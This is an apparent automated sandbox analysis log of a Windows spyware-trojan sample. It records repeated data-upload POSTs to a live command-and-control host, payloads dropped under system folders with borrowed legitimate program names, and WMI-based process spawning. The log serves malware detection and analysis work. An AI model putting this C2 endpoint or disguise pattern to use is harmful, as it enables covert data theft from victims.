                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----kcbsKZtc9dYlo99APjhhMTDtwWHit2hzwfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 863811cm.nyafka.top
                              Source: unknownHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://863811cm.nyafka.top
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://863811cm.nyafka.top/
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003808000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                              Source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: PElAqcNNWD.41.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\55b276f4edf653Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\bcastdvr\7b23a8b4123990Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\Branding\shellbrd\7b23a8b4123990Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMPJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF848F20D4C0_2_00007FF848F20D4C
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF848F20E430_2_00007FF848F20E43
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF84969AD5F0_2_00007FF84969AD5F
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 7_2_00007FF848F40D4C7_2_00007FF848F40D4C
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 7_2_00007FF848F40E437_2_00007FF848F40E43
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F30EF09_2_00007FF848F30EF0
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F304FA9_2_00007FF848F304FA
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F303FA9_2_00007FF848F303FA
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F300009_2_00007FF848F30000
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F300D39_2_00007FF848F300D3
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F20D4C9_2_00007FF848F20D4C
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F20E439_2_00007FF848F20E43
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F516E19_2_00007FF848F516E1
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F5D42A9_2_00007FF848F5D42A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F716E132_2_00007FF848F716E1
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F7D42A32_2_00007FF848F7D42A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F50EF032_2_00007FF848F50EF0
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F504FA32_2_00007FF848F504FA
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F503FA32_2_00007FF848F503FA
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F5000032_2_00007FF848F50000
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F500D332_2_00007FF848F500D3
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F40D4C32_2_00007FF848F40D4C
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F40E4332_2_00007FF848F40E43
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 33_2_00007FF848F10D4C33_2_00007FF848F10D4C
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 33_2_00007FF848F10E4333_2_00007FF848F10E43
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F616E134_2_00007FF848F616E1
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F6D42A34_2_00007FF848F6D42A
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F404FA34_2_00007FF848F404FA
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F403FA34_2_00007FF848F403FA
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F4000034_2_00007FF848F40000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F400D334_2_00007FF848F400D3
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F30D4C34_2_00007FF848F30D4C
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F30E4334_2_00007FF848F30E43
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 35_2_00007FF848F30D4C35_2_00007FF848F30D4C
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 35_2_00007FF848F30E4335_2_00007FF848F30E43
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F304FA36_2_00007FF848F304FA
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F303FA36_2_00007FF848F303FA
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F3000036_2_00007FF848F30000
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F300D336_2_00007FF848F300D3
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F516E136_2_00007FF848F516E1
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F5D42A36_2_00007FF848F5D42A
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F20D4C36_2_00007FF848F20D4C
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F20E4336_2_00007FF848F20E43
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F30D4C37_2_00007FF848F30D4C
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F30E4337_2_00007FF848F30E43
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F616E137_2_00007FF848F616E1
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F6D42A37_2_00007FF848F6D42A
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F40EF037_2_00007FF848F40EF0
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F404FA37_2_00007FF848F404FA
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F403FA37_2_00007FF848F403FA
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F4000037_2_00007FF848F40000
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F400D337_2_00007FF848F400D3
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F30EF038_2_00007FF848F30EF0
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F304FA38_2_00007FF848F304FA
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F303FA38_2_00007FF848F303FA
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F3000038_2_00007FF848F30000
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F300D338_2_00007FF848F300D3
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F516E138_2_00007FF848F516E1
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F5D42A38_2_00007FF848F5D42A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F20D4C38_2_00007FF848F20D4C
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 38_2_00007FF848F20E4338_2_00007FF848F20E43
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F20CA640_2_00007FF848F20CA6
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F204FA40_2_00007FF848F204FA
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F203FA40_2_00007FF848F203FA
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F2000040_2_00007FF848F20000
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F200D340_2_00007FF848F200D3
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F10D4C40_2_00007FF848F10D4C
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F10E4340_2_00007FF848F10E43
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F416E140_2_00007FF848F416E1
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeCode function: 40_2_00007FF848F4D42A40_2_00007FF848F4D42A
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F4D42A41_2_00007FF848F4D42A
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F416E141_2_00007FF848F416E1
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F10D4C41_2_00007FF848F10D4C
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F10E4341_2_00007FF848F10E43
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F20EF041_2_00007FF848F20EF0
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F203FA41_2_00007FF848F203FA
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F204FA41_2_00007FF848F204FA
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F2000041_2_00007FF848F20000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F200D341_2_00007FF848F200D3
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF8492D195F41_2_00007FF8492D195F
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF84968AD5F41_2_00007FF84968AD5F
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF8497B651541_2_00007FF8497B6515
                              Source: C:\Users\Default\SystemSettings.exeCode function: 43_2_00007FF848F00D4C43_2_00007FF848F00D4C
                              Source: C:\Users\Default\SystemSettings.exeCode function: 43_2_00007FF848F00E4343_2_00007FF848F00E43
                              Source: Joe Sandbox ViewDropped File: C:\Recovery\apERZQztEJsqymITPFxguVe.exe C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                              Source: Joe Sandbox ViewDropped File: C:\Users\Default\SystemSettings.exe C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BQDZBqHE.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: lv961v43L3.exe, 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000000.00000002.2107383258.000000001C347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000020.00000002.2196680523.00000000034DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000021.00000002.2220747873.0000000003326000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000021.00000002.2220747873.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000026.00000002.2221206015.00000000029A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exe, 00000026.00000002.2221206015.0000000002931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
                              Source: lv961v43L3.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.csCryptographic APIs: 'CreateDecryptor'
                              Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.csCryptographic APIs: 'CreateDecryptor'
                              Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.csCryptographic APIs: 'CreateDecryptor'
                              Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/86@1/1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMPJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\ExWQYAoA.logJump to behavior
                              Source: C:\Users\Default\SystemSettings.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-DDVr7jAKL4sPNJFYbkfE
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\AppData\Local\Temp\2e3777aa9f8e813616590df35047cd9710d88b08Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat"
                              Source: lv961v43L3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: lv961v43L3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
